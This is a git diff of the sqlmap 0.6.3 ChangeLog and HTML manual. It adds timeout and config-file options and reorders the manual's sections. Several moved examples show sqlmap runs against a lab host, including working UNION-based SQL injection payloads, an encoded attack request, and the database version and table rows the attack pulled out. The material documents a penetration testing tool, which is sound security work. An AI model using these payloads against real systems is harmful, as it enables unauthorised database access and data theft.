diff --git a/doc/ChangeLog b/doc/ChangeLog index 509a41a92..4bebfcfbe 100644 --- a/doc/ChangeLog +++ b/doc/ChangeLog @@ -13,6 +13,8 @@ sqlmap (0.6.3-1) stable; urgency=low the web application technology by parsing some HTTP response headers; * Minor enhancement to fingerprint the back-end DBMS operating system by parsing the DBMS banner value when -b option is provided; + * Minor enhancement to be able to specify the number of seconds before + timeout the connection, default is set to 10 seconds; * Minor enhancement to be able to specify the number of seconds to wait between each HTTP request providing option --delay #; * Minor enhancement to be able to enumerate table columns and dump table @@ -23,15 +25,20 @@ sqlmap (0.6.3-1) stable; urgency=low client HTTP headers (Accept, Accept-Encoding, etc); * Minor improvements to sqlmap Debian package files: sqlmap uploaded to official Debian project repository, on queue at the moment; - * Major bug fix to correctly handle httplib.BadStatusLine exception; - * Minor bug fix to handle session.error and session.timeout in HTTP - requests; - * Minor bug fix so that when the user provide a SELECT statement to be + * Minor improvement to use Python psyco (http://psyco.sourceforge.net/) + library if available to speed up the sqlmap algorithmic operations; + * Minor improvement to retry the HTTP request up to three times in case + an exception is raised during the connection to the target url; + * Major bug fix to correctly enumerate columns on Microsoft SQL Server; + * Major bug fix so that when the user provide a SELECT statement to be processed with an asterisk as columns, now it also work if in the FROM there is no database name specified; - * Minor bug fix to correctly enumerate columns on Microsoft SQL Server; * Minor bug fix to correctly dump table entries when the column is provided; + * Minor bug fix to correctly handle session.error, session.timeout and + httplib.BadStatusLine exceptions in HTTP requests; + * Minor bug fix to correctly catch connection exceptions and notify to + the user also if they occur within a thread; * Increased default output level from 0 to 1; * Updated documentation. diff --git a/doc/README.html b/doc/README.html index da2b257be..bdc54239e 100644 --- a/doc/README.html +++ b/doc/README.html @@ -37,14 +37,15 @@ for the latest version.

5. Usage

6. Disclaimer

@@ -84,10 +85,13 @@ Windows users can download and install the Python setup-ready installer for x86, AMD64 and Itanium too.

Optionally, if you are running sqlmap on Windows, you may wish to install PyReadline -to be able to take advantage of the sqlmap TAB completion and history -support functionalities in the SQL shell and OS shell. +library to be able to take advantage of the sqlmap TAB completion and +history support functionalities in the SQL shell and OS shell. Note that these functionalities are available natively by Python official -readline library on other operating systems.

+readline library on other operating systems. +You can also choose to install +Psyco +library to speed up the sqlmap algorithmic operations.

1.2 Scenario @@ -348,20 +352,25 @@ $ python sqlmap.py -h sqlmap/0.6.3 coded by Bernardo Damele A. G. <bernardo.damele@gmail.com> and Daniele Bellucci <daniele.bellucci@gmail.com> - -Usage: sqlmap.py [options] {-u "<URL>" | -g "<google dork>" | -c "<config file>"} + +Usage: sqlmap.py [options] Options: --version show program's version number and exit -h, --help show this help message and exit - Request: - These options have to be specified to set the target url, HTTP method, - how to connect to the target url or Google dorking results in general. + Target: + At least one of these options has to be specified to set the source to + get target urls from. -u URL, --url=URL Target url + -l LIST Parse targets from Burp or WebScarab logs -g GOOGLEDORK Process Google dork results as target urls - -p TESTPARAMETER Testable parameter(s) + -c CONFIGFILE Load options from a configuration INI file + + Request: + These options can be used to specify how to connect to the target url. + --method=METHOD HTTP method, GET or POST (default: GET) --data=DATA Data string to be sent through POST --cookie=COOKIE HTTP Cookie header @@ -373,8 +382,10 @@ Options: --proxy=PROXY Use a HTTP proxy to connect to the target url --threads=THREADS Maximum number of concurrent HTTP requests (default 1) --delay=DELAY Delay in seconds between each HTTP request + --timeout=TIMEOUT Seconds to wait before timeout connection (default 10) Injection: + -p TESTPARAMETER Testable parameter(s) --string=STRING String to match in page when the query is valid --dbms=DBMS Force back-end DBMS to this value @@ -385,11 +396,11 @@ Options: --time-test Test for Time based blind SQL injection --union-test Test for UNION query (inband) SQL injection - --union-use Use the UNION query (inband) SQL injection to - retrieve the queries output. No need to go blind + --union-use Use the UNION query (inband) SQL injection to retrieve + the queries output. No need to go blind Fingerprint: - -f, --fingerprint Perform an extensive database fingerprint + -f, --fingerprint Perform an extensive DBMS version fingerprint Enumeration: These options can be used to enumerate the back-end database @@ -438,10 +449,9 @@ Options: Miscellaneous: --eta Retrieve each query output length and calculate the estimated time of arrival in real time - -v VERBOSE Verbosity level: 0-5 (default 0) + -v VERBOSE Verbosity level: 0-5 (default 1) --update Update sqlmap to the latest stable version -s SESSIONFILE Save and resume all data retrieved on a session file - -c CONFIGFILE Load options from a configuration INI file --save Save options on a configuration INI file --batch Never ask for user input, use the default behaviour @@ -449,7 +459,7 @@ Options:

-

5.1 Request +

5.1 Target

Target URL

@@ -675,7 +685,7 @@ Content-Type: text/html

-

List of targets

+

Parse targets from Burp or WebScarab logs

Option: -l

@@ -725,90 +735,33 @@ want to test this url? [y/N/q] y

-

Testable parameter(s)

+

Load options from a configuration INI file

-

Option: -p

+

Option: -c

-

By default sqlmap tests all GET parameters, POST -parameters, HTTP Cookie header values and HTTP User-Agent -header value for dynamicity and SQL injection vulnerability, but it is -possible to manually specificy the parameter(s) you want sqlmap to perform -tests on comma separeted in order to skip dynamicity tests and perform SQL -injection test and inject directly only against the provided parameter(s).

-

Example on a PostgreSQL 8.2.7 target:

-

-

-
-$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&cat=2" -v 1 \
-  -p "id"
-
-[hh:mm:48] [INFO] testing connection to the target url
-[hh:mm:48] [INFO] testing if the url is stable, wait a few seconds
-[hh:mm:49] [INFO] url is stable
-[hh:mm:49] [INFO] testing if GET parameter 'id' is dynamic
-[hh:mm:49] [INFO] confirming that GET parameter 'id' is dynamic
-[hh:mm:49] [INFO] GET parameter 'id' is dynamic
-[hh:mm:49] [INFO] testing sql injection on GET parameter 'id'
-[hh:mm:49] [INFO] testing numeric/unescaped injection on GET parameter 'id'
-[hh:mm:49] [INFO] confirming numeric/unescaped injection on GET parameter 'id'
-[hh:mm:49] [INFO] GET parameter 'id' is numeric/unescaped injectable
-[hh:mm:49] [INFO] testing for parenthesis on injectable parameter
-[hh:mm:49] [INFO] the injectable parameter requires 0 parenthesis
-[...]
-
-
-

- -

Or, if you want to provide more than one parameter, for instance:

-

-

-
-$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&cat=2" -v 1 \
-  -p "cat,id"
-
-
-

- -

You can also test only the HTTP User-Agent header.

+

It is possible to pass user's options from a configuration INI file, an +example is sqlmap.conf.

Example on a MySQL 5.0.51 target:

-$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat=2" -v 1 \
-  -p "user-agent" --user-agent "sqlmap/0.6.3 (http://sqlmap.sourceforge.net)"
+$ python sqlmap.py -c "sqlmap.conf"
 
-[hh:mm:40] [WARNING] the testable parameter 'user-agent' you provided is not into the GET
-[hh:mm:40] [INFO] testing connection to the target url
-[hh:mm:40] [INFO] testing if the url is stable, wait a few seconds
-[hh:mm:41] [INFO] url is stable
-[hh:mm:41] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
-[hh:mm:41] [INFO] confirming that User-Agent parameter 'User-Agent' is dynamic
-[hh:mm:41] [INFO] User-Agent parameter 'User-Agent' is dynamic
-[hh:mm:41] [INFO] testing sql injection on User-Agent parameter 'User-Agent'
-[hh:mm:41] [INFO] testing numeric/unescaped injection on User-Agent parameter 'User-Agent'
-[hh:mm:41] [INFO] User-Agent parameter 'User-Agent' is not numeric/unescaped injectable
-[hh:mm:41] [INFO] testing string/single quote injection on User-Agent parameter 'User-Agent'
-[hh:mm:41] [INFO] confirming string/single quote injection on User-Agent parameter 'User-Agent'
-[hh:mm:41] [INFO] User-Agent parameter 'User-Agent' is string/single quote injectable
-[hh:mm:41] [INFO] testing for parenthesis on injectable parameter
-[hh:mm:41] [INFO] the injectable parameter requires 0 parenthesis
-[hh:mm:41] [INFO] testing MySQL
-[hh:mm:41] [INFO] query: CONCAT(CHAR(52), CHAR(52))
-[hh:mm:41] [INFO] retrieved: 44
-[hh:mm:41] [INFO] performed 20 queries in 0 seconds
-[hh:mm:41] [INFO] confirming MySQL
-[hh:mm:41] [INFO] query: LENGTH(CHAR(52))
-[hh:mm:41] [INFO] retrieved: 1
-[hh:mm:41] [INFO] performed 13 queries in 0 seconds
-[hh:mm:41] [INFO] query: SELECT 4 FROM information_schema.TABLES LIMIT 0, 1
-[hh:mm:41] [INFO] retrieved: 4
-[hh:mm:41] [INFO] performed 13 queries in 0 seconds
+[hh:mm:42] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
+[hh:mm:42] [WARNING] GET parameter 'cat' is not dynamic
 back-end DBMS:  MySQL >= 5.0.0

+

Note that if you also provide other options from command line, those are +evaluated when running sqlmap and overwrite the same options, if set, in +the configuration file provided.

+ + +

5.2 Request +

HTTP method: GET or POST

@@ -1213,162 +1166,102 @@ seven HTTP requests, the maximum to retrieve a query output character.

request. The valid value is a float, for instance 0.5.

-

5.2 Techniques +

Seconds to wait before timeout connection

+ +

Option: --timeout

+ +

It is possible to specify a number of seconds to wait before considering +the HTTP connection timed out. The valid value is a float, for instance +10.5.

+ + +

5.3 Injection

-

Test for Time Based Blind SQL injection

+

Testable parameter(s)

-

Option: --time-test

- -

TODO

- - -

Test for UNION query SQL injection

- -

Option: --union-test

- -

It is possible to test if the target URL is affected by an inband -SQL injection vulnerability. -Refer to the Techniques section for details on this SQL injection -technique.

- -

Example on an Oracle XE 10.2.0.1 target:

-

-

-
-$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1&cat=2" \
-  --union-test -v 1
-
-[...]
-back-end DBMS:  Oracle
-
-[hh:mm:55] [INFO] testing inband sql injection on parameter 'id'
-[hh:mm:55] [INFO] the target url could be affected by an inband sql injection vulnerability
-valid union:    'http://192.168.1.121:80/sqlmap/oracle/get_int.php?id=1 UNION ALL SELECT 
-NULL, NULL, NULL FROM DUAL-- AND 5601=5601&cat=2'
-
-
-

+

Option: -p

+

By default sqlmap tests all GET parameters, POST +parameters, HTTP Cookie header values and HTTP User-Agent +header value for dynamicity and SQL injection vulnerability, but it is +possible to manually specificy the parameter(s) you want sqlmap to perform +tests on comma separeted in order to skip dynamicity tests and perform SQL +injection test and inject directly only against the provided parameter(s).

Example on a PostgreSQL 8.2.7 target:

-$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_str.php?id=1&cat=2" \
-  --union-test -v 1
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&cat=2" -v 1 \
+  -p "id"
 
+[hh:mm:48] [INFO] testing connection to the target url
+[hh:mm:48] [INFO] testing if the url is stable, wait a few seconds
+[hh:mm:49] [INFO] url is stable
+[hh:mm:49] [INFO] testing if GET parameter 'id' is dynamic
+[hh:mm:49] [INFO] confirming that GET parameter 'id' is dynamic
+[hh:mm:49] [INFO] GET parameter 'id' is dynamic
+[hh:mm:49] [INFO] testing sql injection on GET parameter 'id'
+[hh:mm:49] [INFO] testing numeric/unescaped injection on GET parameter 'id'
+[hh:mm:49] [INFO] confirming numeric/unescaped injection on GET parameter 'id'
+[hh:mm:49] [INFO] GET parameter 'id' is numeric/unescaped injectable
+[hh:mm:49] [INFO] testing for parenthesis on injectable parameter
+[hh:mm:49] [INFO] the injectable parameter requires 0 parenthesis
 [...]
-back-end DBMS:  PostgreSQL
-
-[hh:mm:05] [INFO] testing inband sql injection on parameter 'id'
-[hh:mm:05] [INFO] the target url could be affected by an inband sql injection vulnerability
-valid union:    'http://192.168.1.121:80/sqlmap/pgsql/get_str.php?id=1' UNION ALL SELECT 
-NULL, NULL, NULL-- AND 'QOAtA'='QOAtA&cat=2'

-

As you can see, the target URL parameter id might be also -affected by an inband SQL injection. -In case this vulnerability is exploitable it is strongly recommended to -use it.

- -

Use the UNION query SQL injection

- -

Option: --union-use

- -

Providing the --union-use parameter, sqlmap will first test if -the target URL is affected by an inband SQL injection -(--union-test) vulnerability then, in case it is vulnerable and -exploitable, it will trigger this vulnerability to retrieve the output of -the SELECT queries.

- -

Example on a Microsoft SQL Server 2000 Service Pack 0 target:

+

Or, if you want to provide more than one parameter, for instance:

-$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1&cat=2" -v 1 \
-  --union-use --banner
-
-[...]
-back-end DBMS:  Microsoft SQL Server 2000
-
-[hh:mm:42] [INFO] fetching banner
-[hh:mm:42] [INFO] testing inband sql injection on parameter 'id'
-[hh:mm:42] [INFO] the target url could be affected by an inband sql injection vulnerability
-[hh:mm:42] [INFO] confirming inband sql injection on parameter 'id'
-[hh:mm:42] [INFO] the target url is affected by an exploitable inband sql injection 
-vulnerability
-[hh:mm:42] [INFO] query:  UNION ALL SELECT NULL, (CHAR(110)+CHAR(83)+CHAR(68)+CHAR(80)+
-CHAR(84)+CHAR(70))+ISNULL(CAST(@@VERSION AS VARCHAR(8000)), (CHAR(32)))+(CHAR(70)+CHAR(82)+
-CHAR(100)+CHAR(106)+CHAR(72)+CHAR(75)), NULL-- AND 5204=5204
-[hh:mm:42] [INFO] performed 3 queries in 0 seconds
-banner:
----
-Microsoft SQL Server  2000 - 8.00.194 (Intel X86) 
-        Aug  6 2000 00:57:48 
-        Copyright (c) 1988-2000 Microsoft Corporation
-        Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
----
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1&cat=2" -v 1 \
+  -p "cat,id"

-

As you can see, the vulnerable parameter (id) is affected by both -blind SQL injection and exploitable inband SQL injection vulnerabilities.

+

You can also test only the HTTP User-Agent header.

Example on a MySQL 5.0.51 target:

-$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat=2" -v 5 \
-  --union-use --banner
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/ua_str.php" -v 1 \
+  -p "user-agent" --user-agent "sqlmap/0.6.3 (http://sqlmap.sourceforge.net)"
 
-[...]
-[hh:mm:25] [INFO] the target url is affected by an exploitable inband sql injection 
-vulnerability
-[hh:mm:25] [INFO] query:  UNION ALL SELECT NULL, CONCAT(CHAR(98,108,76,79,106,78),
-IFNULL(CAST(VERSION() AS CHAR(10000)), CHAR(32)),CHAR(122,110,105,89,121,65)), NULL-- 
-AND 6043=6043
-[hh:mm:25] [TRAFFIC OUT] HTTP request:
-GET /sqlmap/mysql/get_int.php?id=1%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28CHAR%2898
-%2C108%2C76%2C79%2C106%2C78%29%2CIFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%2810000%29%29
-%2C%20CHAR%2832%29%29%2CCHAR%28122%2C110%2C105%2C89%2C121%2C65%29%29%2C%20NULL--%20AND%2
-06043=6043&cat=2 HTTP/1.1
-Host: 192.168.1.121:80
-User-agent: sqlmap/0.6.3 (http://sqlmap.sourceforge.net)
-Connection: close
-
-[hh:mm:25] [TRAFFIC IN] HTTP response (OK - 200):
-Date: Mon, 28 Jul 2008 22:34:25 GMT
-Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.2 with Suhosin-Patch mod_ssl/2.2.8 
-OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
-X-Powered-By: PHP/5.2.4-2ubuntu5.2
-Content-Length: 194
-Connection: close
-Content-Type: text/html
-
-<html><body>
-<b>SQL results:</b>
-<table border="1">
-<tr><td>1</td><td>luther</td><td>blissett</td></tr>
-<tr><td></td><td>blLOjN5.0.51a-3ubuntu5.2zniYyA</td><td></td></tr>
-</table>
-</body></html>
-
-[hh:mm:25] [INFO] performed 3 queries in 0 seconds
-banner:    '5.0.51a-3ubuntu5.2'
+[hh:mm:40] [WARNING] the testable parameter 'user-agent' you provided is not into the GET
+[hh:mm:40] [INFO] testing connection to the target url
+[hh:mm:40] [INFO] testing if the url is stable, wait a few seconds
+[hh:mm:41] [INFO] url is stable
+[hh:mm:41] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
+[hh:mm:41] [INFO] confirming that User-Agent parameter 'User-Agent' is dynamic
+[hh:mm:41] [INFO] User-Agent parameter 'User-Agent' is dynamic
+[hh:mm:41] [INFO] testing sql injection on User-Agent parameter 'User-Agent'
+[hh:mm:41] [INFO] testing numeric/unescaped injection on User-Agent parameter 'User-Agent'
+[hh:mm:41] [INFO] User-Agent parameter 'User-Agent' is not numeric/unescaped injectable
+[hh:mm:41] [INFO] testing string/single quote injection on User-Agent parameter 'User-Agent'
+[hh:mm:41] [INFO] confirming string/single quote injection on User-Agent parameter 'User-Agent'
+[hh:mm:41] [INFO] User-Agent parameter 'User-Agent' is string/single quote injectable
+[hh:mm:41] [INFO] testing for parenthesis on injectable parameter
+[hh:mm:41] [INFO] the injectable parameter requires 0 parenthesis
+[hh:mm:41] [INFO] testing MySQL
+[hh:mm:41] [INFO] query: CONCAT(CHAR(52), CHAR(52))
+[hh:mm:41] [INFO] retrieved: 44
+[hh:mm:41] [INFO] performed 20 queries in 0 seconds
+[hh:mm:41] [INFO] confirming MySQL
+[hh:mm:41] [INFO] query: LENGTH(CHAR(52))
+[hh:mm:41] [INFO] retrieved: 1
+[hh:mm:41] [INFO] performed 13 queries in 0 seconds
+[hh:mm:41] [INFO] query: SELECT 4 FROM information_schema.TABLES LIMIT 0, 1
+[hh:mm:41] [INFO] retrieved: 4
+[hh:mm:41] [INFO] performed 13 queries in 0 seconds
+back-end DBMS:  MySQL >= 5.0.0

-

As you can see, the MySQL version() function (banner) output is -nested (inband) within the HTTP response page, this makes the inband SQL -injection exploitable.

- - -

5.3 Injection -

String match

@@ -1564,7 +1457,161 @@ back-end database management system. If you do not know it, let sqlmap automatically identify it for you.

-

5.4 Fingerprint +

5.4 Techniques +

+ +

Test for Time Based blind SQL injection

+ +

Option: --time-test

+ +

TODO

+ + +

Test for UNION query SQL injection

+ +

Option: --union-test

+ +

It is possible to test if the target URL is affected by an inband +SQL injection vulnerability. +Refer to the Techniques section for details on this SQL injection +technique.

+ +

Example on an Oracle XE 10.2.0.1 target:

+

+

+
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/oracle/get_int.php?id=1&cat=2" \
+  --union-test -v 1
+
+[...]
+back-end DBMS:  Oracle
+
+[hh:mm:55] [INFO] testing inband sql injection on parameter 'id'
+[hh:mm:55] [INFO] the target url could be affected by an inband sql injection vulnerability
+valid union:    'http://192.168.1.121:80/sqlmap/oracle/get_int.php?id=1 UNION ALL SELECT 
+NULL, NULL, NULL FROM DUAL-- AND 5601=5601&cat=2'
+
+
+

+ +

Example on a PostgreSQL 8.2.7 target:

+

+

+
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_str.php?id=1&cat=2" \
+  --union-test -v 1
+
+[...]
+back-end DBMS:  PostgreSQL
+
+[hh:mm:05] [INFO] testing inband sql injection on parameter 'id'
+[hh:mm:05] [INFO] the target url could be affected by an inband sql injection vulnerability
+valid union:    'http://192.168.1.121:80/sqlmap/pgsql/get_str.php?id=1' UNION ALL SELECT 
+NULL, NULL, NULL-- AND 'QOAtA'='QOAtA&cat=2'
+
+
+

+ +

As you can see, the target URL parameter id might be also +affected by an inband SQL injection. +In case this vulnerability is exploitable it is strongly recommended to +use it.

+ +

Use the UNION query SQL injection

+ +

Option: --union-use

+ +

Providing the --union-use parameter, sqlmap will first test if +the target URL is affected by an inband SQL injection +(--union-test) vulnerability then, in case it is vulnerable and +exploitable, it will trigger this vulnerability to retrieve the output of +the SELECT queries.

+ +

Example on a Microsoft SQL Server 2000 Service Pack 0 target:

+

+

+
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mssql/get_int.php?id=1&cat=2" -v 1 \
+  --union-use --banner
+
+[...]
+back-end DBMS:  Microsoft SQL Server 2000
+
+[hh:mm:42] [INFO] fetching banner
+[hh:mm:42] [INFO] testing inband sql injection on parameter 'id'
+[hh:mm:42] [INFO] the target url could be affected by an inband sql injection vulnerability
+[hh:mm:42] [INFO] confirming inband sql injection on parameter 'id'
+[hh:mm:42] [INFO] the target url is affected by an exploitable inband sql injection 
+vulnerability
+[hh:mm:42] [INFO] query:  UNION ALL SELECT NULL, (CHAR(110)+CHAR(83)+CHAR(68)+CHAR(80)+
+CHAR(84)+CHAR(70))+ISNULL(CAST(@@VERSION AS VARCHAR(8000)), (CHAR(32)))+(CHAR(70)+CHAR(82)+
+CHAR(100)+CHAR(106)+CHAR(72)+CHAR(75)), NULL-- AND 5204=5204
+[hh:mm:42] [INFO] performed 3 queries in 0 seconds
+banner:
+---
+Microsoft SQL Server  2000 - 8.00.194 (Intel X86) 
+        Aug  6 2000 00:57:48 
+        Copyright (c) 1988-2000 Microsoft Corporation
+        Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
+---
+
+
+

+ +

As you can see, the vulnerable parameter (id) is affected by both +blind SQL injection and exploitable inband SQL injection vulnerabilities.

+ +

Example on a MySQL 5.0.51 target:

+

+

+
+$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1&cat=2" -v 5 \
+  --union-use --banner
+
+[...]
+[hh:mm:25] [INFO] the target url is affected by an exploitable inband sql injection 
+vulnerability
+[hh:mm:25] [INFO] query:  UNION ALL SELECT NULL, CONCAT(CHAR(98,108,76,79,106,78),
+IFNULL(CAST(VERSION() AS CHAR(10000)), CHAR(32)),CHAR(122,110,105,89,121,65)), NULL-- 
+AND 6043=6043
+[hh:mm:25] [TRAFFIC OUT] HTTP request:
+GET /sqlmap/mysql/get_int.php?id=1%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%28CHAR%2898
+%2C108%2C76%2C79%2C106%2C78%29%2CIFNULL%28CAST%28VERSION%28%29%20AS%20CHAR%2810000%29%29
+%2C%20CHAR%2832%29%29%2CCHAR%28122%2C110%2C105%2C89%2C121%2C65%29%29%2C%20NULL--%20AND%2
+06043=6043&cat=2 HTTP/1.1
+Host: 192.168.1.121:80
+User-agent: sqlmap/0.6.3 (http://sqlmap.sourceforge.net)
+Connection: close
+
+[hh:mm:25] [TRAFFIC IN] HTTP response (OK - 200):
+Date: Mon, 28 Jul 2008 22:34:25 GMT
+Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.2 with Suhosin-Patch mod_ssl/2.2.8 
+OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
+X-Powered-By: PHP/5.2.4-2ubuntu5.2
+Content-Length: 194
+Connection: close
+Content-Type: text/html
+
+<html><body>
+<b>SQL results:</b>
+<table border="1">
+<tr><td>1</td><td>luther</td><td>blissett</td></tr>
+<tr><td></td><td>blLOjN5.0.51a-3ubuntu5.2zniYyA</td><td></td></tr>
+</table>
+</body></html>
+
+[hh:mm:25] [INFO] performed 3 queries in 0 seconds
+banner:    '5.0.51a-3ubuntu5.2'
+
+
+

+ +

As you can see, the MySQL version() function (banner) output is +nested (inband) within the HTTP response page, this makes the inband SQL +injection exploitable.

+ + +

5.5 Fingerprint

Extensive database management system fingerprint

@@ -1779,7 +1826,7 @@ parsing library that fetches data from Chip Andrews' SQLSecurity.com site and outputs it to the XML versions file.

-

5.5 Enumeration +

5.6 Enumeration

Banner

@@ -2250,7 +2297,7 @@ databases tables, only the users' schema that the web application's user is connected to, which is always public.

-

Dump database tables entries

+

Dump database table entries

Options: --dump, -C, -T, -D, --start and --stop

@@ -2349,8 +2396,8 @@ $ cat /software/sqlmap/output/192.168.1.121/dump/public/users.csv

-

You can also provide the --start and/or the --stop option -to limit the dump to a range of entries.

+

You can also provide the --start and/or the --stop +options to limit the dump to a range of entries.